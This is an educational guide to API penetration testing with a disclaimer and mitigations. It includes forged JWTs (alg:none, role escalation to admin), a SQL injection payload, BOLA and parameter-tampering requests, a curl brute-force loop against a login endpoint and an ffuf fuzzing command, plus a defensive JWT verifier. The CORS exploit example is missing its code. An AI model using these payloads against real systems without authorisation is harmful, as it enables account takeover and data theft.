API Penetration Testing: Common Vulnerabilities & Exploits

Comprehensive guide to identifying and exploiting vulnerabilities in API endpoints

⚠️ Ethical Disclaimer: This guide is for educational purposes only. Only test systems you own or have explicit permission to test. Unauthorized testing is illegal.

Introduction to API Penetration Testing

APIs (Application Programming Interfaces) are critical components of modern applications, enabling communication between services. However, their exposure makes them prime targets for attackers. API penetration testing involves identifying and exploiting vulnerabilities to ensure robust security.

Common API Vulnerabilities

1. Broken Authentication

Weak authentication mechanisms allow attackers to impersonate users or gain unauthorized access.

Vulnerability         | Example                       | Risk
----------------------|-------------------------------|------------------------
Weak JWT Validation   | alg: none in JWT header       | Unauthorized access
Predictable Tokens    | user_id=123                   | Account takeover
Credential Stuffing   | Brute-forcing API endpoints   | Mass account compromise
JWT Manipulation Example
# Original JWT (header {"alg":"HS256","typ":"JWT"}, payload {"user_id":123,"role":"user"})
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0.signature

# Modified JWT (payload re-encoded as {"user_id":123,"role":"admin"}; the original HS256 signature no longer matches, so a verifier that checks it rejects this token)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ9.signature

# Bypassing signature validation (header {"alg":"none","typ":"JWT"}, empty signature; only a verifier that trusts the token's own alg field accepts this)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ9.
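As an added example (not code from the original post), a minimal HS256 verifier written against the tokens above: it pins the accepted algorithm server-side, so the alg:none token and a re-encoded admin payload carrying the stale signature are both rejected. The SECRET value and the mint_token helper are assumptions used only to produce a legitimately signed sample.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret; a real service loads its signing key from a secrets store.
SECRET = b"demo-secret-do-not-use"
# The server pins the accepted algorithm; the token's own "alg" header is never trusted.
ALLOWED_ALGS = {"HS256"}
# The alg:none token from the example above; its payload decodes to {"user_id":123,"role":"admin"}.
NONE_TOKEN = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ9."

def b64url_decode(part: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_hs256(signing_input: bytes, secret: bytes) -> str:
    return b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())

def mint_token(payload: dict, secret: bytes = SECRET) -> str:
    """Issue an HS256 token; used here only to produce a legitimately signed sample."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header}.{body}.{sign_hs256(f'{header}.{body}'.encode(), secret)}"

def verify_token(token: str, secret: bytes = SECRET):
    """Return the payload of a valid token, or None for anything that fails a check."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except ValueError:  # bad base64, bad UTF-8 and bad JSON all subclass ValueError
        return None
    # Reject "none" and any algorithm other than the one this server issues.
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        return None
    expected = sign_hs256(f"{header_b64}.{payload_b64}".encode(), secret)
    # Constant-time compare so the check leaks nothing about the expected signature.
    if not hmac.compare_digest(expected.encode(), sig_b64.encode()):
        return None
    try:
        return json.loads(b64url_decode(payload_b64))
    except ValueError:
        return None
```

The same algorithm pinning is what a well-configured JWT library does when you pass it an explicit algorithm allow-list rather than letting it read the header.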

2. Broken Object Level Authorization (BOLA)

BOLA occurs when an API accepts an object identifier from the request but never checks that the caller is authorized for that specific object, so any authenticated user can read or modify other users' resources.

BOLA Exploit Example
# Request to access another user's data
GET /api/users/456 HTTP/1.1
Host: vulnerable-api.com
Authorization: Bearer user_token_123

# Response (should be forbidden but returns data)
{
  "id": 456,
  "email": "victim@example.com",
  "sensitive_data": "credit_card_info"
}

3. Excessive Data Exposure

APIs may return more data than necessary, exposing sensitive information.

Excessive Data Exposure Example
# Request
GET /api/users/123 HTTP/1.1
Host: vulnerable-api.com

# Response (includes sensitive fields)
{
  "id": 123,
  "name": "John Doe",
  "email": "john@example.com",
  "password_hash": "hashed_password",
  "ssn": "123-45-6789"
}

4. Injection Attacks

APIs that process user input without validation are vulnerable to injection attacks like SQL, NoSQL, or command injection.

SQL Injection Example
# Malicious request
POST /api/search HTTP/1.1
Host: vulnerable-api.com
Content-Type: application/json

{
  "query": "1' OR '1'='1"
}

# Response (the always-true condition matches every row, so the endpoint returns the whole table instead of a filtered result)
{
  "results": [
    {"id": 1, "username": "admin", ...},
    {"id": 2, "username": "user", ...}
  ]
}

5. Improper Rate Limiting

Lack of rate limiting allows attackers to brute-force endpoints or cause denial-of-service (DoS).

Brute-Force Example
# Script to brute-force login (reads one password per line; a Content-Type header is needed for the JSON body to be parsed as JSON)
while IFS= read -r password; do
  curl -s -X POST https://vulnerable-api.com/api/login \
    -H "Content-Type: application/json" \
    -d "{\"username\":\"admin\",\"password\":\"$password\"}"
done < passwords.txt

Exploitation Techniques

1. Fuzzing API Endpoints

Fuzzing involves sending unexpected inputs to discover hidden endpoints or vulnerabilities.

Fuzzing with ffuf
ffuf -w wordlist.txt -u https://vulnerable-api.com/api/FUZZ -H "Authorization: Bearer token"
# Common findings: /admin, /debug, /metrics

2. Parameter Tampering

Parameter tampering means modifying query parameters or request body fields (object identifiers, prices, flags) so that the server applies a restriction to a value the client chose rather than one it verified.

Parameter Tampering Example
# Original request
GET /api/orders?user_id=123 HTTP/1.1
Host: vulnerable-api.com

# Tampered request
GET /api/orders?user_id=456 HTTP/1.1
Host: vulnerable-api.com

3. Exploiting Misconfigured CORS

Misconfigured Cross-Origin Resource Sharing (CORS) can allow unauthorized domains to access API resources.

CORS Exploit Example
# Malicious HTML

Mitigation Techniques

For Developers:

  • Implement strong authentication (e.g., OAuth 2.0, JWT with proper validation)
  • Enforce object-level authorization checks
  • Filter and sanitize all inputs to prevent injection
  • Use rate limiting and throttling
  • Return only necessary data in responses
  • Configure CORS securely
  • Regularly audit API endpoints with tools like OWASP ZAP or Burp Suite

For Pentesters:

Test all API endpoints, including undocumented ones. Pay attention to authentication, authorization, and input validation. Use tools like Postman, Burp Suite, or custom scripts for thorough testing.

Conclusion

API penetration testing is critical for securing modern applications. By understanding common vulnerabilities and exploitation techniques, developers and pentesters can build and test robust APIs.
